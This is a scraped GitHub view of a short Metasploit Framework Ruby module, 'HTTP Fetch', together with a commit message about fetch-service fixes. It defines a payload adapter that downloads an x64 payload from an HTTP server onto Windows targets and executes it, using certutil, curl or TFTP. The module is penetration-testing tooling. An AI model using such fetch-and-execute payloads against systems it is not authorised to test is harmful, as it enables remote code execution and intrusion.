a8c240f671
* Build the HTTPS server on top of HTTP instead of the other way around * Set the fetch service to nil after it has been cleaned up * Don't capitalize the H in the word handler * Check if the fetch_service is truthy before cleaning it up * Remove the unused FetchServerName datastore option * Fixup the description text * Don't allow slashes in fetch file names * Also add the #fetch_bindnetloc method Fix a problem in fetch/tftp.rb
33 lines
935 B
Ruby
33 lines
935 B
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
module MetasploitModule
|
|
include Msf::Payload::Adapter::Fetch::HTTP
|
|
include Msf::Payload::Adapter::Fetch::WindowsOptions
|
|
|
|
def initialize(info = {})
|
|
super(
|
|
update_info(
|
|
info,
|
|
'Name' => 'HTTP Fetch',
|
|
'Description' => 'Fetch and execute an x64 payload from an HTTP server.',
|
|
'DefaultOptions' => { 'FETCH_COMMAND' => 'CERTUTIL' },
|
|
'Author' => 'Brendan Watters',
|
|
'Platform' => 'win',
|
|
'Arch' => ARCH_CMD,
|
|
'License' => MSF_LICENSE,
|
|
'AdaptedArch' => ARCH_X64,
|
|
'AdaptedPlatform' => 'win'
|
|
)
|
|
)
|
|
deregister_options('FETCH_COMMAND')
|
|
register_options(
|
|
[
|
|
Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CERTUTIL', %w[CURL TFTP CERTUTIL]])
|
|
]
|
|
)
|
|
end
|
|
end
|